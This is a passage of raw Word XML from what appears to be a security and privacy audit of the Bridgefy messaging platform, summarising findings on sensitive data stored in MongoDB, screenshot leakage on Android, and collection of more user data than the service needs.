        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="369" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Prekeys, encrypted messages, licenses, invoices, payment methods (stripeId, brand, last4, expirationDate, country), etc. were found in the Mongo database (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-007</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="374" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Messages and alternative information could be leaked via Android screenshots, due to a missing security screen (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:sz w:val="22"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-033</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="370"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Implementing the recommendations provided in the aforementioned tickets will substantially improve data protection at rest and in transit. It is further advised to extrapolate the mitigation guidance offered under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-Q04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to resolve these </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250008" w:id="47"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-Q06:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>gathers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>more</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>than</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>strictly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>necessary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Proven</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Privacy Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The Bridgefy team</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>publicly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>discloses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>collected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>platform via the company’s privacy policy page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>188</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. The page stipulates the rights users of the platform have over the data collected as well as a clear path to get in contact with the Bridgefy team.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>summarizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>answer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>question:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="366" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q6:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>there</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>data gathered on the apps, SDK &amp; servers beyond what is necessary for the service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>At the time of writing, the Bridgefy web app, mobile apps, and SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>collect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>beyond what is strictly necessary for the service to operate, this includes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>version,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>manufacturer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Partial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(e.g.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>“AM”,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>“AO”,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>etc.).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
          <w:tab w:pos="2193" w:val="left" w:leader="none"/>
          <w:tab w:pos="2740" w:val="left" w:leader="none"/>
          <w:tab w:pos="4057" w:val="left" w:leader="none"/>
          <w:tab w:pos="4701" w:val="left" w:leader="none"/>
          <w:tab w:pos="6054" w:val="left" w:leader="none"/>
          <w:tab w:pos="6794" w:val="left" w:leader="none"/>
          <w:tab w:pos="7728" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1440" w:right="376" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>From</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Dashboard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>application,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>profiles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(companyName, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>companyWebsite, country, role, industry, and use).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Contact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(sent,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>received,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>user,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>contact).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>about</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>received.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In addition, the following information is required by the web app, mobile apps, SDK, or third-party services but there does not appear to be a need store these items in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>MongoDB:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487635968">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>108041</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
